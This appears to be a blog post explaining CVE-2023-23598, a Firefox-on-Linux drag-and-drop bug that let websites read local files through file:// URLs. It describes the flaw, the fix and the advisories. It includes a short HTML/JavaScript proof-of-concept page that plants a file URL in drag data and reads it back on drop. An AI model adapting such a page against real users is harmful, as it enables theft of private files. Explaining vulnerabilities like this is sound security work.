CVE-2023-23598 - How a Firefox Bug Let Websites Steal Local Files with Drag & Drop
CVE-2023-23598 is a pretty serious security flaw that affected Firefox (before version 109), Thunderbird (before 102.7), and Firefox ESR (before 102.7). In this post, I'll walk you through what happened, explain the bug in simple terms, show you example code, and break down how an attacker could have abused it.
What Was CVE-2023-23598?
When you drag-and-drop something (like a file or some text) in Firefox on Linux, it uses something called the GTK wrapper to work with your system's drag-and-drop features. The problem was this: if a website put a file URL (for example, file:///home/yourusername/secret.txt) into the drag data, Firefox would wrongly let the website read the content of that file.
Why? Because GTK (the system library Firefox used) treats any text/plain drag data containing file URLs as if you're dragging a file. Firefox passed whatever the website set in DataTransfer.setData('text/plain', ...) straight to the GTK layer, opening the door for abuse.
In Plain English
A malicious website could secretly drag-and-drop (or make you drag something) and include a file:// URL in the drag data. Firefox's code, because of GTK's behavior, would translate this "text" into access to your local files. The result: a website could steal any file you have on your computer, just by tricking you to drag something!
References
- Mozilla Security Advisory 2023-01
- BleepingComputer report
- Bugzilla bug 1801241
- CVE-2023-23598 on NVD
A website uses JavaScript to set up a drag event.
2. In that event, the site runs DataTransfer.setData('text/plain', 'file:///home/yourusername/secrets.txt').
Firefox passes this as plain text to GTK, but GTK sees it’s a file and tries to read it.
4. If you drop the data somewhere the page controls (or sometimes without much interaction), the website gets the contents of your local file!
Example Exploit Code
Below is a simplified example of how a malicious web page could exploit this bug. Do not use this code for anything illegal.
<!DOCTYPE html>
<html>
<body>
<h2>Drag this box anywhere</h2>
<div id="dragme" draggable="true" style="width:200px;height:50px;border:1px solid #333;">
Drag me!
</div>
<script>
// The file path below is just an example.
const secretFile = 'file:///home/yourusername/secrets.txt';
document.getElementById('dragme').addEventListener('dragstart', function(e) {
e.dataTransfer.setData('text/plain', secretFile);
});
// Drop target that would read the file content (in affected versions)
document.body.addEventListener('drop', function(e) {
e.preventDefault();
var fileContent = e.dataTransfer.getData('text/plain'); // Firefox <109 would actually fetch the file!
alert('Leaked file: ' + fileContent);
});
</script>
</body>
</html>
Why is this dangerous? On affected browsers, dragging and dropping this element could let the attacker read any file you specify. All they need to do is trick you into dragging something on their site.
How Was It Fixed?
Mozilla fixed this by changing how Firefox passes drag data to the GTK layer. From Firefox 109 and up, Firefox no longer treats text/plain data as files unless it actually comes from a real file input from the user's computer, not just something set via JavaScript.
Even basic features like drag-and-drop can hide scary bugs.
- Browsers are very complex, and "mismatches" between web standards and system libraries (like GTK) can create surprising vulnerabilities.
Final Thoughts
CVE-2023-23598 is a classic example of how easy it is for powerful browser features to become accidental security risks. Always keep your browser up to date, and if you're a developer, be careful with how low-level APIs interact with your code!
If you want to geek out more, check the original Mozilla advisory or Bugzilla report for the full technical details.
Timeline
Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/08/2023 15:01:00 UTC